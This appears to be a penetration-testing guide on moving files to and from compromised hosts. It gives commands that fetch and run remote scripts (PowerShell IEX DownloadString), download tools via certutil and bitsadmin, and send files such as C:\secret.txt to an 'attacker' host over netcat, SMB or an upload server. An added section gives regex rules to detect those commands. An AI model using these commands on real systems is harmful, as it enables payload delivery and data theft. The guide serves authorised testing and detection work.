File Transfer Techniques for Penetration Testing

During penetration tests, you often need to transfer files between your attack machine and compromised targets. This guide covers various file transfer techniques for both Linux and Windows environments.

Python HTTP Server

# On attacker (serve files)
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080

# On target (download)
# Linux
wget http://attacker:8080/file
curl http://attacker:8080/file -o file

# Windows
certutil -urlcache -f http://attacker:8080/file file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://attacker:8080/file','file.exe')"
powershell Invoke-WebRequest -Uri http://attacker:8080/file -OutFile file.exe

Netcat

# Receiver (attacker)
nc -lvnp 4444 > received_file

# Sender (target)
nc attacker_ip 4444 < file_to_send

# Alternative with timeout
nc -w 3 attacker_ip 4444 < file_to_send

SCP and SSH

# Copy to remote
scp file.txt user@target:/path/

# Copy from remote
scp user@target:/path/file.txt .

# Copy directory
scp -r directory/ user@target:/path/

# Using SSH
ssh user@target "cat > /tmp/file" < local_file

Base64 Encoding

# When no file transfer tools are available

# On attacker - encode file
base64 -w 0 file > file.b64
cat file.b64

# On target - decode (Linux)
echo "BASE64_STRING" | base64 -d > file

# On target - decode (Windows PowerShell)
[IO.File]::WriteAllBytes("C:\file.exe", [Convert]::FromBase64String("BASE64_STRING"))

SMB Server

# On attacker (Impacket)
impacket-smbserver share /path/to/files
impacket-smbserver share /path/to/files -smb2support
impacket-smbserver share /path/to/files -smb2support -user test -password test

# On Windows target
copy \\attacker_ip\share\file.exe C:\temp\
net use Z: \\attacker_ip\share
xcopy \\attacker_ip\share\file.exe C:\temp\

# Copy file TO attacker
copy C:\secret.txt \\attacker_ip\share\

PowerShell Methods

# Download file
Invoke-WebRequest -Uri http://attacker/file -OutFile file.exe
(New-Object Net.WebClient).DownloadFile("http://attacker/file","file.exe")
iwr -uri http://attacker/file -outfile file.exe

# Download and execute in memory
IEX(New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')
powershell -c "IEX(IWR http://attacker/script.ps1)"

# Upload file
(New-Object Net.WebClient).UploadFile("http://attacker/upload","C:\file.txt")

# Base64 encoded command
powershell -enc BASE64_ENCODED_COMMAND

Certutil (Windows)

# Download file
certutil -urlcache -f http://attacker/file.exe file.exe

# Encode to base64
certutil -encode file.exe encoded.txt

# Decode from base64
certutil -decode encoded.txt file.exe

Bitsadmin (Windows)

bitsadmin /transfer job /download /priority high http://attacker/file C:\file.exe
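
The certutil, bitsadmin and PowerShell commands above leave recognisable process command lines, which is what defenders match in process-creation telemetry (for example Sysmon Event ID 1 or Security event 4688 with command-line auditing). The following is an added example, not part of the original guide: the rule names, host names and sample events are constructed for illustration.

```python
import re

# Rules keyed to the Windows download commands listed in this guide.
# Rule names are labels invented for this example.
RULES = [
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://", re.I)),
    ("certutil_decode", re.compile(r"\bcertutil(\.exe)?\b.*[-/]decode\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I)),
    ("ps_webclient_download", re.compile(r"net\.webclient\)?\.download(file|string)", re.I)),
    ("ps_iwr_outfile", re.compile(r"\b(invoke-webrequest|iwr)\b.*-outfile\b", re.I)),
    ("ps_iex_remote", re.compile(r"\biex\b.*(downloadstring|\biwr\b|invoke-webrequest)", re.I)),
    # -e, -ec and -en... resolve to -EncodedCommand; -ExecutionPolicy (-ex...) does not match
    ("ps_encoded_command", re.compile(r"\bpowershell(\.exe)?\b.*\s-e(c|n[a-z]*)?\s", re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Take (host, cmdline) pairs; return (host, cmdline, hits) for those with hits."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((host, cmdline, hits))
    return findings

# Constructed process-creation events (host, command line) for demonstration.
SAMPLE_EVENTS = [
    ("WS01", r"certutil -urlcache -f http://attacker:8080/file file.exe"),
    ("WS01", r"certutil -hashfile C:\temp\setup.exe SHA256"),
    ("WS02", r"bitsadmin /transfer job /download /priority high http://attacker/file C:\file.exe"),
    ("WS02", r"bitsadmin /list /allusers"),
    ("WS03", r'powershell -c "IEX(IWR http://attacker/script.ps1)"'),
    ("WS03", r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ("WS04", r"powershell -enc RwBlAHQALQBEAGEAdABlAA=="),
    ("WS04", r"certutil -decode encoded.txt file.exe"),
]

if __name__ == "__main__":
    for host, cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}: {cmdline}")
```

Legitimate administration also uses certutil, BITS and encoded PowerShell, so treat hits as triage leads and correlate them with the parent process and the destination host.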

FTP

# On attacker - start FTP server
python3 -m pyftpdlib -p 21 -w

# On Linux target
ftp attacker_ip
# binary, get file, quit

# On Windows - create script
echo open attacker_ip > ftp.txt
echo anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo binary >> ftp.txt
echo get file.exe >> ftp.txt
echo quit >> ftp.txt
ftp -s:ftp.txt

PHP

# Download
php -r "file_put_contents('file', file_get_contents('http://attacker/file'));"

# Using curl
php -r '$ch=curl_init("http://attacker/file");$fp=fopen("file","w");curl_setopt($ch,CURLOPT_FILE,$fp);curl_exec($ch);'

Upload Servers

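# Simple Python upload server
# Create uploadserver.py (the cgi module was removed in Python 3.13; run with 3.12 or earlier)
import cgi
import http.server
import os

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_POST(self):
        # Parse the multipart/form-data body sent by curl -F
        form = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
            environ={'REQUEST_METHOD':'POST'})
        # Keep only the final path component so a client-supplied name
        # such as ../../x cannot write outside the current directory
        name = os.path.basename(form['file'].filename)
        with open(name, 'wb') as f:
            f.write(form['file'].file.read())
        self.send_response(200)
        self.end_headers()

http.server.HTTPServer(("",8080), Handler).serve_forever()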

# Upload with curl
curl -F "file=@/path/to/file" http://attacker:8080/

Summary

Having multiple file transfer techniques at your disposal is essential during penetration tests. Network restrictions may block certain protocols, so knowing alternatives ensures you can always move tools and data. Practice these methods in your lab environment to use them quickly during engagements.

Written by

Window Events
